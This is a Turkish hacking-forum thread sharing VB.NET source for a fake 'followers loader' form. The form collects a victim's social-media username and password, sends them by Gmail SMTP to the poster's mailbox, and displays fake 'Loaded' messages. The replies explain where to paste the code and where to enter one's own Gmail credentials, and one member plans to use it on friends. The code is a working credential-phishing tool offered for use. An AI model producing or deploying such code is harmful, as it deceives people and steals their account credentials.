Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Username İncorrect")
If TextBox2.Text = "" Then
MsgBox("Password İncorrect")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Gmail", "Gmail Sifre")
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail")
mail.To.Add("Gmail")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Followers Loading to Your Account")
MsgBox("Loaded")
End Sub
End Class
Olur sadece gmail bilgini yazman yeterli.Moruq Eyw Başlayasım Geldide Bişey Merak Ediyorum Bu Ana Menüyü Yaptım Diyelim Ana Menüye Tıklayıp Kodları Yapıştırsam Olurmu ?
bi özelden tam anlatsan benimde bu işe merakım varda sana zahmet özelden anlatsan kodları nasıl falan yapıcam nasıl gmail bilgimi falan yazıcamOlur sadece gmail bilgini yazman yeterli.
Forumda araştırarak bulabilirsin, visual basic 2010 olması gerek veya 2017saol da bişe anlamadım bu visual basic kodunu napcaz
form 1 icine mi atayım koduForumda araştırarak bulabilirsin, visual basic 2010 olması gerek veya 2017
butona yapıştırıcaksın dostumMoruq Eyw Başlayasım Geldide Bişey Merak Ediyorum Bu Ana Menüyü Yaptım Diyelim Ana Menüye Tıklayıp Kodları Yapıştırsam Olurmu ?
dostum bende diyorum işte anladığım ettiğim yok ss li falan anlatsan iyi olmazmı ?butona yapıştırıcaksın dostum
visual studio bilgisayarında var ise özele geldostum bende diyorum işte anladığım ettiğim yok ss li falan anlatsan iyi olmazmı ?
Tasarım kötü olduğundan, iyi yaparsan herkes yer.dostum bu taktiği yiyende ne bileyim artık sosyal medyada takılmasın
evetform 1 icine mi atayım kodu
Ekledim.Eline sağlık bro bizim arkadaşlara gönderem sonra sizi HeCkLediM Filan Diyim
Post automatically merged:
Bro bu arada google ile ilgili bir indirme sitesine atmışsın benim için dosyauploada atıp özelden atsan ?
Saol <3Ekledim.
O kullanıcının ıd sı ve şifresi konuyu dikkatli oku lütfen.Ben Tam Anlamadımda Oraya ID Ve Şifreni Yazdığında Nasıl Bize Gelecek ?
Parantez içlerinde yazan "Gmail" ve "Gmail Sifre" yerine kendi Gmail hesabınızın mailini girin, ve şifresini girin.O kullanıcının ıd sı ve şifresi konuyu dikkatli oku lütfen.
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?